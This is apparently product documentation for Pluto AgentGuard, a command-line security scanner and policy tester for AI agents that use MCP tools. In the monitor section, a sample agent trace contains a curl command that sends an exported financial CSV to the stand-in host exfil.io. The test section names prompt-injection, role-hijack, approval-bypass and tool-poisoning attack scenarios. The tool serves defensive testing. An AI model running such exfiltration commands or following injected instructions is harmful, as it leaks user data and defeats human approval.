Pluto AgentGuard v0.9 — How It Works

📐 Where AgentGuard Fits

YOUR APPLICATION

AI Agent

Calls tools, accesses data, chains actions via MCP

⬇️ prompts & responses

LAYER 1 — ALREADY SOLVED

Content Guardrails

Azure Content Safety · NeMo · Guardrails AI — filters toxic/unsafe text

⬇️ tool calls & actions

LAYER 2 — THE GAP AGENTGUARD FILLS

🛡️ Pluto AgentGuard

Scans · Tests · Monitors · Simulates · Generates Evidence · Detects Drift · Reports OWASP Coverage

Seven Commands

🔍

aguard scan

Find secrets, misconfigs, unsafe code in any AI project

🎯

aguard test

17 adversarial attacks against your policy — what gets through?

📡

aguard monitor

Replay traces, detect unauthorized actions + drift

🔮

aguard whatif

Simulate policy changes, see risk drop before applying

🛡️

aguard owasp

20-control OWASP MCP/LLM coverage report

📋

aguard evidence

Launch readiness packet with approval checklist

📏

aguard baseline

Snapshot + drift detection over time

Prerequisites

Requirement	Details	Check
Python	3.10 or higher	`python --version`
pip	Any recent version	`pip --version`
Cloud accounts	❌ Not needed. Runs 100% locally.

🔍 aguard scan — Static Security Analysis

Point it at any AI project folder. Finds real issues — no MCP configs required.

Your Project

*.py, .env, Dockerfile,
mcp.json, requirements.txt

→

🛡️ aguard scan

18+ secret patterns
AI code analysis
MCP config checks

→

Report

terminal / JSON /
HTML / SARIF

What it finds

Finding	Severity	OWASP
eval()/exec() on LLM output	CRITICAL	MCP05
Wildcard (*) permissions on MCP server	CRITICAL	MCP02
No auth on remote MCP server	CRITICAL	MCP07
Tool poisoning in descriptions	CRITICAL	MCP03
Hardcoded secrets (18+ patterns)	HIGH	MCP01
.env not in .gitignore	HIGH	MCP01
Secrets in Dockerfile ENV	HIGH	MCP01
LangChain allow_dangerous_requests=True	HIGH	MCP05
Sensitive info in system prompts	HIGH	MCP10
LangChain verbose=True in production	MEDIUM	—
Container running as root	MEDIUM	—
Unpinned AI dependencies	MEDIUM	MCP04
No timeout or rate limits	MEDIUM	LLM10

Example output

Terminal

$ aguard scan ./my-agent-project/ 🔍 Scanning ./my-agent-project... 🔴 CRITICAL: Unsafe execution of LLM output: eval() (MCP05:2025) 📄 agent.py:24 🟠 HIGH: Hardcoded OpenAI Key detected (MCP01:2025) 📄 .env:1 · Evidence: sk-p****cdef 🟠 HIGH: .env file not in .gitignore (MCP01:2025) 🟠 HIGH: Secret in Dockerfile ENV (MCP01:2025) 🟠 HIGH: LangChain dangerous requests allowed (MCP05:2025) 🟡 MEDIUM: Unpinned AI dependencies (MCP04:2025) 🟡 MEDIUM: Container runs as root 📊 Risk Score: 100/100 ██████████████████████████████████████████████████ 📋 Findings: 1 critical · 14 high · 3 medium 📂 Scanned 5 files in 155ms

CI gate flags

CI Pipeline

$ aguard scan . --max-risk 50 --fail-on high --format sarif -o results.sarif # Exits code 1 if risk > 50 or any HIGH+ findings # SARIF output integrates with GitHub Advanced Security

🎯 aguard test — Adversarial Policy Simulation

Simulates 17 attack scenarios against your policy. Reports what gets caught vs. what gets through. No LLM needed.

5 Attack Packs

💉

prompt-injection

Instruction override, role hijack, indirect injection, encoded payloads

📤

data-exfiltration

File export, network exfil, email exfil, SQL dump

⬆️

permission-escalation

Write on read-only, approval bypass, sudo, file delete

🔓

approval-bypass

Urgency bypass, claimed pre-auth, batch bypass

☠️

tool-poisoning

Hidden instructions, rug-pull updates

Example output

Terminal

$ aguard test --policy agent-policy.yaml --attack-pack all 🎯 Adversarial Policy Simulation Policy: agent-policy.yaml Agent: data-analyst-agent Scenarios: 17 ✅ PASS PI-001 Direct instruction override execute Blocked ✅ PASS PI-002 Role hijacking via system prompt shell Blocked ✅ PASS PI-003 Indirect injection via tool desc stripe.refund Blocked ✅ PASS DE-001 File export of sensitive data file_write Blocked ✅ PASS DE-002 Network exfiltration via curl execute Blocked ❌ FAIL DE-004 SQL data dump sql_query NOT caught ✅ PASS PE-001 Write on read-only tool sql_query Blocked ✅ PASS PE-003 Sudo/admin escalation sudo Blocked ✅ PASS TP-001 Hidden instructions in tool output execute Blocked 📊 Results: 16 blocked · 1 missed · 17 total ⚠️ 1 attack (6%) would succeed against this policy Recommended fixes: → Add sql_query to denied_tools → Add sql_query to require_human_approval

📡 aguard monitor — Behavioral Audit

Replays agent action logs and checks every tool call against your declared policy.

What it detects

Violation	Severity	Example
Denied tool invoked	CRITICAL	Agent called `execute` — explicitly blocked
Permission escalation	CRITICAL	DELETE via sql_query with read-only permission
Unauthorized tool	HIGH	Agent called `file_write` — not in allowed list
Missing approval	HIGH	`deploy` without human-in-the-loop
Expired approval	HIGH	Approval was granted but has expired

Example: data exfiltration caught

Terminal

$ aguard monitor --trace-file traces.jsonl --policy policy.yaml 📡 Monitoring agent behavior... Turn 1: 🔧 sql_query({"query": "SELECT * FROM financials"}) Turn 2: 🔧 file_write({"path": "/tmp/export.csv"}) 🚨 DRIFT: Agent invoked unauthorized tool 'file_write' 🚨 DRIFT: Tool 'file_write' used without human approval Turn 3: 🔧 execute({"command": "curl https://exfil.io -d @/tmp/export.csv"}) 🚨 DRIFT: Agent invoked denied tool 'execute' → Possible prompt injection attack. 🚨 5 policy violations detected

🔮 aguard whatif — Policy Impact Simulator

A differentiated feature: simulate the risk impact of policy changes before applying them.

Try it — toggle policies and watch the risk score change

100

Current Risk

→

100

After Policies

No policies applied

0 (Safe)50100 (Critical)

Restrict SQL tool to SELECT-only queries↓15%

Add human-in-the-loop for file operations↓20%

Rotate API keys to ephemeral tokens↓10%

Add rate limits (100 calls/min) + timeout↓12%

Restrict outbound network to allowlist↓18%

Switch to explicit tool allowlist↓14%

Run agent in sandboxed environment↓22%

☝️ Interactive demo of what aguard whatif does in the terminal.

🛡️ aguard owasp — OWASP Control Coverage

Evaluates 20 controls mapped to OWASP MCP Top 10 and LLM Top 10. Each control uses precise finding-ID matching.

OWASP MCP Top 10 — Control Status

❌ MCP01 — Token Mismanagement

3 failed, 1 passed

AGC-MCP01-001 secrets · 002 tokens · 003 Dockerfile · 004 .env

✅ MCP02 — Privilege Escalation

2 passed, 1 not tested

AGC-MCP02-001 wildcards · 002 declarations · 003 drift

⚠️ MCP03 — Tool Poisoning

1 passed, 1 not tested

AGC-MCP03-001 descriptions · 002 attack pack

❌ MCP04 — Supply Chain

1 failed

AGC-MCP04-001 pinned deps

❌ MCP05 — Command Injection

1 failed, 1 passed, 1 not tested

AGC-MCP05-001 HITL · 002 eval/exec · 003 attack pack

⚠️ MCP06 — Intent Flow Subversion

1 not tested

AGC-MCP06-001 prompt injection pack

✅ MCP07 — AuthN/AuthZ

2 passed

AGC-MCP07-001 auth · 002 HTTPS

⚠️ MCP08 — Audit & Telemetry

2 not tested

AGC-MCP08-001 monitoring · 002 evidence

🔲 MCP09 — Shadow MCP Servers

Planned v1.0

—

❌ MCP10 — Context Injection

1 failed

AGC-MCP10-001 system prompt leaks

Example output

Terminal

$ aguard owasp ./my-project/ 🛡️ OWASP Coverage Report ❌ MCP01:2025 Token Mismanagement: 3 failed, 1 passed ✗ AGC-MCP01-001: No hardcoded secrets → 11 finding(s) ✓ AGC-MCP01-002: No static long-lived tokens ✗ AGC-MCP01-003: No secrets in Dockerfile ENV ✗ AGC-MCP01-004: .env excluded from VCS ✅ MCP07:2025 AuthN/AuthZ: 2 passed ✓ AGC-MCP07-001: Remote servers have auth ✓ AGC-MCP07-002: HTTPS transport ───────────────────────────────────── 📊 Summary OWASP MCP Mapped: 9/10 risks Controls: 8 passed · 6 failed · 6 not tested · 20 total

📋 Evidence & Baseline

aguard evidence — Launch Readiness Packet

Generates a Markdown report for security review before shipping an agent to production.

Section	What It Contains
Risk Summary	Overall score, finding counts by severity
Security Findings	Every issue with OWASP ID, description, remediation
Tool Permissions	What the agent can access
Policy Coverage	Allowed/denied tools, HITL gates, data access rules
Required Mitigations	Actionable checklist of HIGH/CRITICAL fixes
Launch Approval	Sign-off template: approver, date, decision

Terminal

$ aguard evidence . --config agent.yaml --policy policy.yaml ✅ Launch readiness packet saved to launch-readiness.md

aguard baseline — Drift Detection

Terminal

$ aguard baseline create . ✅ Baseline saved to .aguard-baseline.json # ... time passes, configs change ... $ aguard baseline compare . 📏 Baseline Drift Report Risk Score: 72 → 45 (↓ 27 points) ✅ Resolved (3): - Hardcoded OpenAI Key in .env - Missing auth on remote MCP server 🆕 New (1): - Static long-lived token on slack-server $ aguard baseline compare . --fail-on-drift # Exits code 1 if new findings → CI gate

🔌 Integration Guide

📦

Any AI Project

Run aguard scan . on any Python/Node project. Finds secrets, unsafe code, Docker issues.

🔗

MCP Projects

Auto-discovers mcp.json, .mcp.yaml. Checks permissions, auth, transport, tool poisoning.

⚙️

CI/CD Pipeline

--max-risk 50 --fail-on high --format sarif
SARIF integrates with GitHub Advanced Security.

🔭

OpenTelemetry

Export agent traces to JSONL → aguard monitor checks against policy.

GitHub Actions example

.github/workflows/agent-security.yml

- name: Agent Security Gate run: | pip install pluto-aguard aguard scan . --max-risk 50 --fail-on high --format sarif -o results.sarif aguard test --policy policy.yaml --fail-on-miss aguard baseline compare . --fail-on-drift - uses: github/codeql-action/upload-sarif@v3 with: sarif_file: results.sarif

What should be true for a healthy project

✅ Passing	❌ Failing
No hardcoded secrets	API keys in source or .env committed
No eval/exec on LLM output	Code injection via LLM responses
Remote MCP servers authenticated	Unauthenticated remote servers
Dangerous tools require approval	execute/shell without HITL
AI deps pinned	openai, langchain unpinned
All adversarial tests pass	Policy misses attack scenarios
Risk score < 50	Risk score ≥ 50